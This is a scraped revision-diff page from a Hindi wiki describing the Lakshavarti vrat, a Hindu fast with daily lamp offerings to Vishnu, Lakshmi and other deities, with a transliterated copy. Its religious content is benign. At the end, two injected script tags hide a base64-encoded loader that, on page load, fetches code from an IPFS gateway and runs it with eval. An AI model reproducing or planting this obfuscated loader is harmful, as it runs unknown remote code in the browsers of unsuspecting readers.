Difference between revisions of "लक्षवर्ति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*लक्षवर्तिव्रत [[कार्तिक]], [[वैसाख]] एवं [[माघ]] में आरम्भ होता है।
 
*लक्षवर्तिव्रत [[कार्तिक]], [[वैसाख]] एवं [[माघ]] में आरम्भ होता है।
 
*लक्षवर्तिव्रत के लिए वैसाख सर्वोत्तम होता है।
 
*लक्षवर्तिव्रत के लिए वैसाख सर्वोत्तम होता है।
 
*लक्षवर्तिव्रत [[पूर्णिमा]] पर तीन मासों में समाप्त होता है।
 
*लक्षवर्तिव्रत [[पूर्णिमा]] पर तीन मासों में समाप्त होता है।
*प्रतिदिन एक सहस्र वातियों से [[विष्णु]] एवं [[लक्ष्मी]], [[ब्रह्मा]] एवं [[सावित्री]], [[शिव]] एवं [[उमा]] की आरती उतारना चाहिए।<ref>स्मृतिकौस्तुभ (410-411); व्रतार्क (पाण्डुलिपी 399-403 बी, [[वायु पुराण]] से उद्धरण)</ref>
+
*प्रतिदिन एक सहस्र वातियों से [[विष्णु]] एवं [[लक्ष्मी]], [[ब्रह्मा]] एवं [[सावित्री]], [[शिव]] एवं [[उमा]] की आरती उतारना चाहिए।<ref>स्मृतिकौस्तुभ (410-411); व्रतार्क (पाण्डुलिपी 399-403 बी, [[वायु पुराण]] से उद्धरण</ref>
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:59, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • lakshavartivrat kartik, vaisakh evan magh mean arambh hota hai.
  • lakshavartivrat ke lie vaisakh sarvottam hota hai.
  • lakshavartivrat poornima par tin masoan mean samapt hota hai.
  • pratidin ek sahasr vatiyoan se vishnu evan lakshmi, brahma evan savitri, shiv evan uma ki arati utarana chahie.[1]

tika tippani aur sandarbh

  1. smritikaustubh (410-411); vratark (pandulipi 399-403 bi, vayu puran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>